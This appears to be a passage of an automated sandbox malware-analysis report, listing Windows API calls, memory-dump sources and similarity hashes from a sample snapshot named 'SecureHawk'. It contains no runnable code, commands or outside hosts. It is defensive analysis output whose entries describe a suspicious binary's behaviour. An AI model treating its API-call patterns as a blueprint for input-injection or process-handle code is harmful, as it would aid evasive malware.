                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003508D3,?,00000001), ref: 003518B0
                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003508D3,?,00000001), ref: 003518C2
                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003508D3,?,00000001), ref: 00351907
                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003508D3,?,00000001), ref: 0035191C
                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003508D3,?,00000001), ref: 00351927
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                  • String ID:
                                  • API String ID: 2156557900-0
                                  • Opcode ID: 8c41b758c99cfee6b0e8b0a5717ba00853b3e2ddf81e970ff8528e1c5e3ae07b
                                  • Instruction ID: 18a9ba1f4eda73ae0e38206ab50c48cc6aff7625ba50ae70f4b4b819d0e9dada
                                  • Opcode Fuzzy Hash: 8c41b758c99cfee6b0e8b0a5717ba00853b3e2ddf81e970ff8528e1c5e3ae07b
                                  • Instruction Fuzzy Hash: 1831F072A00304BFEB639F10DC48F7A77ADEB85316F124159FE10D62A0D7B49D488BA4
                                  APIs
                                  • GetSysColor.USER32(00000008), ref: 002F260D
                                  • SetTextColor.GDI32(?,000000FF), ref: 002F2617
                                  • SetBkMode.GDI32(?,00000001), ref: 002F262C
                                  • GetStockObject.GDI32(00000005), ref: 002F2634
                                  • GetClientRect.USER32(?), ref: 0032C02C
                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0032C043
                                  • GetWindowDC.USER32(?), ref: 0032C04F
                                  • GetPixel.GDI32(00000000,?,?), ref: 0032C05E
                                  • ReleaseDC.USER32(?,00000000), ref: 0032C070
                                  • GetSysColor.USER32(00000005), ref: 0032C08E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                  • String ID:
                                  • API String ID: 3430376129-0
                                  • Opcode ID: f16df3f26a10393314673c8d975dbc55d3de6aaab73899bdb2bcc2b65bf490b7
                                  • Instruction ID: 80cffd3159050ff8edf160ecabe1d48de3d9df72cdd74891b3dfb5ef67f05deb
                                  • Opcode Fuzzy Hash: f16df3f26a10393314673c8d975dbc55d3de6aaab73899bdb2bcc2b65bf490b7
                                  • Instruction Fuzzy Hash: B5116732110205EFDBA65FB4EC09BA97B69EF49331F1042A1FA25990E1CB310969EF10
                                  APIs
                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002FADE1
                                  • OleUninitialize.OLE32(?,00000000), ref: 002FAE80
                                  • UnregisterHotKey.USER32(?), ref: 002FAFD7
                                  • DestroyWindow.USER32(?), ref: 00332E94
                                  • FreeLibrary.KERNEL32(?), ref: 00332EF9
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00332F26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                  • String ID: close all
                                  • API String ID: 469580280-3243417748
                                  • Opcode ID: 8d24a77422e7db0b56cb8ea0063ee214b1aef97b8776ae7db28ae0623a44185d
                                  • Instruction ID: 15b34e3e59333b7ba0d98ed0e842540a973e27e686b269fdc5026cfd8f7c5671
                                  • Opcode Fuzzy Hash: 8d24a77422e7db0b56cb8ea0063ee214b1aef97b8776ae7db28ae0623a44185d
                                  • Instruction Fuzzy Hash: 70A160707112128FCB2AEF14C595A7AF364FF04740F1142ADE90AAB2A1CB71ED66CF91
                                  APIs
                                  • EnumChildWindows.USER32(?,0034AF1D), ref: 0034AE5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ChildEnumWindows
                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                  • API String ID: 3555792229-1603158881
                                  • Opcode ID: 8a265e213836c94aa589e1cb4d3c8f99349f9bbd1e590773a195620b02d191c9
                                  • Instruction ID: f85062f027314bc9026c62cb33058335ff2a8ba5f1537aaae605fe23e759498f
                                  • Opcode Fuzzy Hash: 8a265e213836c94aa589e1cb4d3c8f99349f9bbd1e590773a195620b02d191c9
                                  • Instruction Fuzzy Hash: 7C91C330A40905ABDB0EDF60C491BEAFBA9FF45300F508119D85AAF681DF70B999DBD1
                                  APIs
                                  • SetWindowLongW.USER32(?,000000EB), ref: 002F327E
                                    • Part of subcall function 002F218F: GetClientRect.USER32(?,?), ref: 002F21B8
                                    • Part of subcall function 002F218F: GetWindowRect.USER32(?,?), ref: 002F21F9
                                    • Part of subcall function 002F218F: ScreenToClient.USER32(?,?), ref: 002F2221
                                  • GetDC.USER32 ref: 0032CFA3
                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0032CFB6
                                  • SelectObject.GDI32(00000000,00000000), ref: 0032CFC4
                                  • SelectObject.GDI32(00000000,00000000), ref: 0032CFD9
                                  • ReleaseDC.USER32(?,00000000), ref: 0032CFE1
                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0032D06C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                  • String ID: U
                                  • API String ID: 4009187628-3372436214
                                  • Opcode ID: 848be56c97af289fc6a09c5fd5ed88f39b9df6735baae06e522796f81b26d6f6
                                  • Instruction ID: 4880967051474137163d690c506d00af4874df35ea8e873ab56c18ee4148b55e
                                  • Opcode Fuzzy Hash: 848be56c97af289fc6a09c5fd5ed88f39b9df6735baae06e522796f81b26d6f6
                                  • Instruction Fuzzy Hash: 4571E330500209EFCF22CF64DC84ABABBB5FF49364F148269EE555A1A6C7318D56DF60
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00380980), ref: 003691DA
                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00380980), ref: 0036920E
                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00369388
                                  • SysFreeString.OLEAUT32(?), ref: 003693B2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                  • String ID:
                                  • API String ID: 560350794-0
                                  • Opcode ID: d609647fc5122e63c3b06d4a77f51cd6e085c8e20c6755204398c5488035e03b
                                  • Instruction ID: 2fb783de4cbea01db0d96f8665f7417eb41da44cb5529bbf97cee9d657554865
                                  • Opcode Fuzzy Hash: d609647fc5122e63c3b06d4a77f51cd6e085c8e20c6755204398c5488035e03b
                                  • Instruction Fuzzy Hash: D8F14C75A00209EFCB06DF94C884EAEB7B9FF49314F118099F916AB254DB31AE46CF50
                                  APIs
                                  • _memset.LIBCMT ref: 0036FB66
                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0036FCF9
                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0036FD1D
                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0036FD5D
                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0036FD7F
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0036FEFB
                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0036FF2D
                                  • CloseHandle.KERNEL32(?), ref: 0036FF5C
                                  • CloseHandle.KERNEL32(?), ref: 0036FFD3
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                  • String ID:
                                  • API String ID: 4090791747-0
                                  • Opcode ID: 847ef4a418d2fd7a822d0f1cd2f497ff2b203d6f354a782cc6502bd14548cbfa
                                  • Instruction ID: 9b8fa51999d1f3f8d7e319ee420b136c4f0326aac4b6d60496d76a7d8a9543fc
                                  • Opcode Fuzzy Hash: 847ef4a418d2fd7a822d0f1cd2f497ff2b203d6f354a782cc6502bd14548cbfa
                                  • Instruction Fuzzy Hash: 19E1E0312043009FC71AEF24D891A6ABBE0AF89314F14C56DF9999F2A6CB71EC45CF52
                                  APIs
                                    • Part of subcall function 00354A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003539F7,?), ref: 00354A4D
                                    • Part of subcall function 00354A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003539F7,?), ref: 00354A66
                                    • Part of subcall function 00354E59: GetFileAttributesW.KERNEL32(?,00353A6B), ref: 00354E5A
                                  • lstrcmpiW.KERNEL32(?,?), ref: 00355168
                                  • _wcscmp.LIBCMT ref: 00355182
                                  • MoveFileW.KERNEL32(?,?), ref: 0035519D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                  • String ID:
                                  • API String ID: 793581249-0
                                  • Opcode ID: f3c09a122af82bcc0b9ae88e3ce3aa05340ac4880c909a202aa718030666917a
                                  • Instruction ID: 521ed56d9d55d1f4ed115bf01572e3ce0eaa1ff7ccaa3305516b219c5730a8c4
                                  • Opcode Fuzzy Hash: f3c09a122af82bcc0b9ae88e3ce3aa05340ac4880c909a202aa718030666917a
                                  • Instruction Fuzzy Hash: 2C5172B20087849BC766DBA0D891DDBB7ECAF84341F00091EB989D7161EF70A28C8766
                                  APIs
                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00378AEC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: InvalidateRect
                                  • String ID:
                                  • API String ID: 634782764-0
                                  • Opcode ID: b081edcb5a8fe2f8641edeeaa8271f02b28c9866828b2a68020e361e9ece660e
                                  • Instruction ID: 770b14ba4ff50dd9a8ab5f342999b32a88f5f05dfa78eb869daf5a9a9786c4d9
                                  • Opcode Fuzzy Hash: b081edcb5a8fe2f8641edeeaa8271f02b28c9866828b2a68020e361e9ece660e
                                  • Instruction Fuzzy Hash: 10510470581209BFEF779F28CC8DB597BA8EB05350F208512F618D65E1CF79A994CB50
                                  APIs
                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0032C568
                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0032C58A
                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0032C5A2
                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0032C5C0
                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0032C5E1
                                  • DestroyIcon.USER32(00000000), ref: 0032C5F0
                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0032C60D
                                  • DestroyIcon.USER32(?), ref: 0032C61C
                                    • Part of subcall function 0037A89C: DeleteObject.GDI32(00000000), ref: 0037A8D5
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                  • String ID:
                                  • API String ID: 2819616528-0
                                  • Opcode ID: ca45ed760671d7f2abd8aa10e9a3b8544abb2a20ead9c7751c7c231c15843f70
                                  • Instruction ID: 38b5e8726d33dbe7bb7285c33a1ec5c9c9af2eca1290f4a1fdd9bfb6b9e1e4b4
                                  • Opcode Fuzzy Hash: ca45ed760671d7f2abd8aa10e9a3b8544abb2a20ead9c7751c7c231c15843f70
                                  • Instruction Fuzzy Hash: 89518A70620209EFDB25DF25DC45BAAB7B9EB49350F204628FA02D7690D7B0EDA4DB50
                                  APIs
                                    • Part of subcall function 0034B310: GetWindowThreadProcessId.USER32(?,00000000), ref: 0034B330
                                    • Part of subcall function 0034B310: GetCurrentThreadId.KERNEL32 ref: 0034B337
                                    • Part of subcall function 0034B310: AttachThreadInput.USER32(00000000,?,0034A01E,?,00000001), ref: 0034B33E
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0034A029
                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0034A046
                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0034A049
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0034A052
                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0034A070
                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0034A073
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0034A07C
                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0034A093
                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0034A096
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                  • String ID:
                                  • API String ID: 2014098862-0
                                  • Opcode ID: 3c89f3f00523e15085c3ccc39115ce502f0a68616776061a6fd338728145f553
                                  • Instruction ID: f53ebecd6746e2c8ab4121bfc85a55497b8286c0a769fb37cf1d750ad2f39ac4
                                  • Opcode Fuzzy Hash: 3c89f3f00523e15085c3ccc39115ce502f0a68616776061a6fd338728145f553
                                  • Instruction Fuzzy Hash: 58110475550618BEF6116F608C8DF6A7F6DEB4C760F100459F2406F090CAF26C509BA4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00348F3D,00000B00,?,?), ref: 003492C5
                                  • HeapAlloc.KERNEL32(00000000,?,00348F3D,00000B00,?,?), ref: 003492CC
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00348F3D,00000B00,?,?), ref: 003492E1
                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00348F3D,00000B00,?,?), ref: 003492E9
                                  • DuplicateHandle.KERNEL32(00000000,?,00348F3D,00000B00,?,?), ref: 003492EC
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00348F3D,00000B00,?,?), ref: 003492FC
                                  • GetCurrentProcess.KERNEL32(00348F3D,00000000,?,00348F3D,00000B00,?,?), ref: 00349304
                                  • DuplicateHandle.KERNEL32(00000000,?,00348F3D,00000B00,?,?), ref: 00349307
                                  • CreateThread.KERNEL32(00000000,00000000,0034932D,00000000,00000000,00000000), ref: 00349321
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                  • String ID:
                                  • API String ID: 1957940570-0
                                  • Opcode ID: 079b5fae1a36e5a455353cc8a4cde2f19e043aee43d369fca9b1b9bc0bd6ac31
                                  • Instruction ID: d1706f401c3ecd32373485731e24bd4faa9f37234cb27494a96b360960e700d3
                                  • Opcode Fuzzy Hash: 079b5fae1a36e5a455353cc8a4cde2f19e043aee43d369fca9b1b9bc0bd6ac31
                                  • Instruction Fuzzy Hash: 4001CDBA240304BFE751AFA5DC8DF6B7BACEB89711F404451FA05DB1A1DA70A804CB20
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInit$_memset
                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                  • API String ID: 2862541840-625585964
                                  • Opcode ID: e4fd92ec9a40fd3ca0da4cd29e053ab110f347454accfef37378119ac1530d34
                                  • Instruction ID: e02ef8e06b425d20c0217b3b94d83b2258f2dbdbf89f39f3d98d1544a34df67e
                                  • Opcode Fuzzy Hash: e4fd92ec9a40fd3ca0da4cd29e053ab110f347454accfef37378119ac1530d34
                                  • Instruction Fuzzy Hash: 0B918D71A00219EBDF26CFA5C844FAEBBBCEF45710F10815AF515AB295D7709944CFA0
                                  APIs
                                    • Part of subcall function 00347B0B: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00347A45,80070057,?,?,?,00347E56), ref: 00347B28
                                    • Part of subcall function 00347B0B: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00347A45,80070057,?,?), ref: 00347B43
                                    • Part of subcall function 00347B0B: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00347A45,80070057,?,?), ref: 00347B51
                                    • Part of subcall function 00347B0B: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00347A45,80070057,?), ref: 00347B61
                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00369CB8
                                  • _memset.LIBCMT ref: 00369CC5
                                  • _memset.LIBCMT ref: 00369E08
                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00369E34
                                  • CoTaskMemFree.OLE32(?), ref: 00369E3F
                                  Strings
                                  • NULL Pointer assignment, xrefs: 00369E8D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                  • String ID: NULL Pointer assignment
                                  • API String ID: 1300414916-2785691316
                                  • Opcode ID: 5e214768b5d45cd788ca9f414c4c4dea097f1039fbe17d06148438ea20b7c650
                                  • Instruction ID: 0b159712f89cb5ee351502613a114d4c975f05f5f0d70cc9b58d2eb09d576d94
                                  • Opcode Fuzzy Hash: 5e214768b5d45cd788ca9f414c4c4dea097f1039fbe17d06148438ea20b7c650
                                  • Instruction Fuzzy Hash: 5F914B71D01229EBDB12DFA0DC85EDEBBB9EF08310F10815AF515AB295DB719A44CFA0
                                  APIs
                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00377211
                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00377225
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0037723F
                                  • _wcscat.LIBCMT ref: 0037729A
                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 003772B1
                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003772DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window_wcscat
